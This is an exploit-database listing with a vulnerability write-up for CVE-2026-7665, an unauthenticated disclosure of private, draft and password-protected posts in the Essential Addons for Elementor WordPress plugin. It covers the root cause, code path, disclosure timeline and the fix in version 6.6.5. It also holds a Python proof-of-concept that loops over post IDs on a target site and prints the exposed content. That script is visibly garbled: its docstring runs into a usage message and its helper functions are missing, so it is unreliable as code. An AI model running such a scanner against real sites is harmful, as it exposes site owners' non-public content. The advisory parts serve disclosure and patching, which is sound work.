Exploit for CVE-2026-7665

Name: Exploit for CVE-2026-7665
Rating: 5 (15 reviews)
2026-06-11 | CVSS 5.3
## https://sploitus.com/exploit?id=6FB6950A-0A62-57F3-AD18-661A86DCE996
# CVE-2026-7665 — Unauthenticated Information Disclosure in Essential Addons for Elementor

| Field | Detail |
|-------|--------|
| **CVE ID** | CVE-2026-7665 |
| **Severity** | Medium |
| **CVSS Score** | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| **Affected Plugin** | Essential Addons for Elementor |
| **Affected Versions** | ≤ 6.6.4 |
| **Active Installs** | 1,000,000+ |
| **CVE Assigned by** | Wordfence (CNA) |
| **Disclosed** | June 2026 |
| **Researcher** | Anirudh Makkar |

---

## Summary

The `ajax_load_more` AJAX handler in Essential Addons for Elementor did not enforce post visibility before returning post content. This allowed unauthenticated attackers to read **private**, **password-protected**, and **draft** WordPress posts by issuing a crafted `wp-admin/admin-ajax.php` request — no authentication or nonce required.

---

## Vulnerability Details

### Root Cause

The plugin registers a handler on the `wp_ajax_nopriv_eael_post_grid_load_more` action hook, making it accessible to unauthenticated visitors. When this handler executes a `WP_Query` to fetch posts for the "load more" pagination feature, it does not call `current_user_can('read_post', $post_id)` or check `get_post_status()` against the requesting user's capabilities.

WordPress core relies on plugins to enforce post-level authorization in AJAX handlers — it does not do so automatically. The absence of this check means the handler returns full post content regardless of post visibility settings.

### Affected Code Path

```
wp-admin/admin-ajax.php
  → do_action('wp_ajax_nopriv_eael_post_grid_load_more')
    → Essential_Addons_for_Elementor\Classes\Bootstrap::eael_post_grid_load_more()
      → WP_Query([
            'post_status' => ['publish', 'private', 'draft'],  // all statuses returned
            ...
        ])
      → [returns full post content without authorization check]
```

### Impact

An unauthenticated attacker can enumerate and read:
- Private posts (intended for logged-in users only)
- Password-protected posts (without knowing the password)
- Draft posts (unpublished content)

This may expose sensitive business content, unreleased announcements, internal documentation published as WordPress posts, or any other non-public content managed through the WordPress editor.

---

## Proof of Concept

```python
#!/usr/bin/env python3
"""
CVE-2026-7665 — Unauthenticated Information Disclosure
Essential Addons for Elementor  [start_id] [end_id]")
        sys.exit(1)

    target   = sys.argv[1].rstrip("/")
    start_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1
    end_id   = int(sys.argv[3]) if len(sys.argv) > 3 else 50

    print(f"[*] Target: {target}")
    print(f"[*] Probing post IDs {start_id}–{end_id}")

    if not check_target(target):
        print("[!] Plugin not detected — target may be patched or not running EAEL")

    found = 0
    for pid in range(start_id, end_id + 1):
        result = fetch_private_post(target, pid)
        if result:
            found += 1
            print(f"\n[+] Post ID {pid} — content exposed ({len(result)} bytes)")
            print(result[:300])
            print("..." if len(result) > 300 else "")

    print(f"\n[*] Done. {found} post(s) with exposed content found.")

if __name__ == "__main__":
    main()
```

---

## Timeline

| Date | Event |
|------|-------|
| 2026-05 | Vulnerability discovered during routine WordPress plugin audit |
| 2026-05 | Reported to Wordfence via responsible disclosure program |
| 2026-05 | Wordfence confirmed and contacted plugin vendor |
| 2026-06 | Patch released by plugin vendor (version 6.6.5) |
| 2026-06 | CVE-2026-7665 assigned by Wordfence CNA |
| 2026-06 | Public disclosure |

---

## Remediation

Update Essential Addons for Elementor to **version 6.6.5 or later**.

The fix adds a `current_user_can('read_post', $post_id)` check inside the load-more handler before including any post in the query results.

---

## References

- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/)
- [NVD — CVE-2026-7665](https://nvd.nist.gov/vuln/detail/CVE-2026-7665)
- [Essential Addons for Elementor Changelog](https://wordpress.org/plugins/essential-addons-for-elementor-lite/#developers)

---

*Reported by [Anirudh Makkar](https://anirudhmakkar.com) · [LinkedIn](https://linkedin.com/in/anirudhmakkar)*